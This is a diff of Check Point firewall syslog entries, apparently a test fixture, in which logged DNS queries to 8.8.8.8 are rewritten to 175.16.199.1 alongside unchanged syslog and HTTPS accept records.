+<134>1 2020-03-29T16:53:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d28a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500810"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:38Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d292,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500818"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51988"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33882"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d293,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500819"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:40Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d294,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500820"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47300"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:53:41Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d295,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:53:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500828"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:48Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500828"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34425"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:49Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500829"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37611"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d29e,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500830"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51400"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:50Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d29e,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500830"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51400"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50043"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50044"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50045"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:53:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2a1,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50046"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T16:53:58Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500838"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51214"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500840"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42118"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500849"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32849"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b2,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55943"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bb,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500859"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500860"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:58Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500838"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38270"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51214"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:53:59Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a7,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500839"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
